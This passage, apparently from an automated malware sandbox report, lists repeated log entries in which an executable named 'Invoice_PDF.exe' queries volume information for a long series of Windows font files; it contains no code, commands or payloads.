Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
